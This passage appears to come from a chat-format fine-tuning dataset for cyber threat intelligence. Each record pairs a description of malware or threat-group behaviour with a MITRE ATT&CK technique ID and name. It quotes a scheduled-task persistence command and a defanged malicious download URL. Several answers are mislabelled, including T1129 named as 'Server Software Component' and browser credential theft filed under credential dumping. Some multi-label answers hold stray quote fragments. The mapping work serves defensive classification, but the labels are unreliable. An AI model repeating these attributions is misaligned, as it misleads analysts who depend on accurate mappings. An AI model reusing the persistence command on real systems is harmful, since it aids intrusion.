- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Epic uses the \"nbtstat -n\" and \"nbtstat -s\" commands on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gamaredon Group has downloaded additional malware and tools onto a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NDiskMonitor uses AES to encrypt certain information sent over its C2 channel."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Milan can establish persistence on a targeted host with scheduled tasks."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of downloading files from the C2."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The sample checks that the machine is domain joined and retrieves the domain name before execution continues. A userID is generated by computing the MD5 of a network interface MAC address that is up and not a loopback device, the domain name, and the registry value HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The legitimate owaauth.dll file resides in %ProgramFiles%\\Microsoft\\Exchange Server\\ClientAccess\\Owa\\Auth\\ while CTU researchers have observed the backdoor using the same filename in the %ProgramFiles%\\Microsoft\\Exchange Server\\ClientAccess\\Owa\\bin\\ directory"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A tool can use a public UAC bypass method to elevate privileges."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TajMahal has the ability to capture keystrokes on an infected host."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot can use Rundll32.exe to enable C2 communication."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dark Caracal has used macros in Word documents that would download a second stage if executed."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses file and folder names related to legitimate programs in order to blend in, such as HP, Intel, Adobe, and perflogs."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SilverTerrier uses SMTP for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.003 - Mail Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Diavol has a command to traverse the files and directories in a given path."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can delete files on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Conti can spread itself by infecting other remote machines via network shared drives."
- },
- {
- "role": "assistant",
- "content": "T1080 - Taint Shared Content"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Caterpillar WebShell can obtain a list of the services from a system."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This has led it to do more, such as: Communication with more C&C servers – up to 16 P2P communication between infected nodes MAC address check - PlugX runs if the MAC address of an infected host coincides with configuration information in itself (If not specified in the configuration, PlugX runs on any host)"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery', 'T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "VERMIN collects keystrokes from the victim machine."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In 2016, CTU researchers observed the group using native system functionality to disable logging processes and delete logs within a compromised environment"
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools', 'T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The screenshot also shows the Glimpse server receiving the results of the whoami command executed by the agent"
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MiniDuke can download additional encrypted backdoors onto the victim via GIF files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can list directories on a victim."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FunnyDream can use Native API for defense evasion, discovery, and collection."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains a module to steal credentials from Web browsers on the victim machine."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chrommme has the ability to list drives and obtain the computer name of a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN8 has attempted to map to C$ on enumerated hosts to test the scope of their current credentials/context."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cuba logs keystrokes via polling by using \"GetKeyState\" and \"VkKeyScan\" functions."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Skidmap has created a fake \"rm\" binary to replace the legitimate Linux binary."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stuxnet calls LoadLibrary then executes exports from a DLL."
- },
- {
- "role": "assistant",
- "content": "T1129 - Server Software Component"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used Remote Desktop Protocol for lateral movement. The group has also used tunneling tools to tunnel RDP into the environment."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bisonal has used HTTP for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "writes multiple outputs to a TMP file using the >> method."
- },
- {
- "role": "assistant",
- "content": "T1074 - Data Staged"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Machete has used msiexec to install the Machete malware."
- },
- {
- "role": "assistant",
- "content": "T1218.007 - Signed Binary Proxy Execution: Msiexec"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware can use a SOAP Web service to communicate with its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Strider has used a hidden file system that is stored as a file on disk."
- },
- {
- "role": "assistant",
- "content": "T1564.005 - Hidden File System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PolyglotDuke can use Twitter, Reddit, Imgur and other websites to get a C2 URL."
- },
- {
- "role": "assistant",
- "content": "T1102.001 - Dead Drop Resolver"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ThiefQuest prepends a copy of itself to the beginning of an executable file while maintaining the name of the executable."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The main function gets pertinent strings to communicate with its C2 by calling a sub-function with a specific number that the sub-function uses as a case within a switch statement to decrypt the desired string"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "implements a command and control protocol over HTTP."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Conficker will copy itself with a random name into the system directory %systemroot%\\system32 and register itself as a service. The remote computer will then download the worm from the URL given and then start to infect other machines as well. Therefore, there is no centralized point of download. Upon successful infection, it will also patch the hole to prevent other worms to infect the machine\" (Racicot"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TRITON disguised itself as the legitimate Triconex Trilog application."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Xbash has maliciously encrypted victim's database systems and demanded a cryptocurrency ransom be paid."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a custom binary protocol for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 2: Textbox inside DOC The combined script from Word textbox drops the following components: \\Users\\[user_name]\\Intel\\58d2a83f7778d5.36783181.vbs \\Users\\[user_name]\\Intel\\58d2a83f777942.26535794.ps1 \\Users\\[user_name]\\Intel\\58d2a83f777908.23270411.vbs Also, the script creates a named schedule task for persistence to launch “58d2a83f7778d5.36783181.vbs” every 25 minutes"
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery', 'T1036 - Masquerading', 'T1087 - Account Discovery', 'T1064 - Scripting', 'T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Retriever uses .NET web services and the SoapHttpClientProtocol class to communicate with its C2 server, which generates HTTP requests resembling the example request in Figure 4"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For Operation Dust Storm, the threat actors disguised some executables as JPG files."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware can deactivate security mechanisms in Microsoft Office by editing several keys and values under HKCU\\Software\\Microsoft\\Office\\."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZIRCONIUM has exfiltrated stolen data to Dropbox."
- },
- {
- "role": "assistant",
- "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "P8RAT can check for specific processes associated with virtual environments."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lucifer has established persistence by creating the following scheduled task \"schtasks /create /sc minute /mo 1 /tn QQMusic ^ /tr C:Users\\%USERPROFILE%\\Downloads\\spread.exe /F\"."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Earth Lusca used a VBA script to execute WMI."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA551 has used HTTP for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "2) When contacted, the Google Drive link retrieves a zip file, which contains a .lnk file obfuscated as a .pdf file using the double extension trick. 3) This file requires the target to attempt to open the .lnk file, which redirects the user to a Windows Scripting Component (.wsc) file, hosted on an adversary-controlled microblogging page. MUSTANG PANDA has previously used the observed microblogging site to host malicious PowerShell scripts and Microsoft Office documents in targeted attacks on Mongolia-focused NGOs. 4) The .lnk file uses an embedded VBScript component to retrieve a decoy PDF file and a PowerShell script from the adversary-controlled web page"
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RainyDay can use a file exfiltration tool to collect recently changed files on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used a script (atexec.py) to execute a command on a target machine via Task Scheduler."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Throughout the spear-phishing campaign, the threat actors used email attachments to leverage legitimate Microsoft Office functions for retrieving a document from a remote server using the Server Message Block (SMB) protocol. Note: transfer of credentials can occur even if the file is not retrieved. After obtaining a credential hash, the threat actors can use password-cracking techniques to obtain the plaintext password. With valid credentials, the threat actors are able to masquerade as authorized users in environments that use single-factor authentication"
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Taidoor uses RC4 to encrypt the message body of HTTP content."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PS1 can inject its payload DLL Into memory."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It drops ransom notes at various folders in the system and opens one after it has encrypted the data and documents of the victim. As with usual ransomware, it does this to extort money from the victim in exchange for the decryption of their files"
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bazar can retrieve information from the infected machine."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Meteor will delete the folder containing malicious scripts if it detects the hostname as `PIS-APP`, `PIS-MOB`, `WSUSPROXY`, or `PIS-DB`."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RogueRobin uses various WMI queries to check if the sample is running in a sandbox."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An APT19 Port 22 malware variant registers itself as a service."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When the backdoor establishes a connection to the command and control server, it sets the request period time equal to the specified dwell time for the standby mode"
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1) Moving the (malicious) application into the /Users/user/Library/ directory 2) Executing this persisted copy, via the open command 3) Decrypting embedded strings that relate to file extensions of (likely) interest"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "On September 24, 2018, we observed an organization targeted by OilRig attempting to download a Zip archive from the following URL: hxxp://193.111.152[.]13/[redacted]-ITsoftwareUpdate.zip This Zip archive contained a file named [redacted]-ITsoftwareUpdate.exe (SHA256: 5f42deb792d8d6f347c58ddbf634a673b3e870ed9977fdd88760e38088cd7336), which is a variant of the OopsIE Trojan we described in detail in a blog we published in September 2018"
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chaes has used an unsigned, crafted DLL module named \"hha.dll\" that was designed to look like a legitimate 32-bit Windows DLL."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In addition to this, as reported by our peers at ESET last week, the group has also begun using a UEFI (Unified Extensible Firmware Interface) rootkit known as Lojax. Because the rootkit resides within a computer’s flash memory, it allows the attackers to maintain a persistent presence on a compromised machine even if the hard drive is replaced or the operating system is reinstalled"
- },
- {
- "role": "assistant",
- "content": "T1014 - Rootkit"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "2) Scan the network environment of the infected machine; checks for availability of specific ports on servers that share the same internal and external subnet mask (i.e 255.255.0.0\\16). 3) Try to exploit the following Remote Code Execution vulnerabilities in the targeted servers"
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "performs multiple process injections to hijack system processes and execute malicious code."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoshC2 can perform port scans from an infected host."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POORAIM can perform screen capturing."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Milan can use a custom protocol tunneled through DNS or HTTP."
- },
- {
- "role": "assistant",
- "content": "T1572 - Protocol Tunneling"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
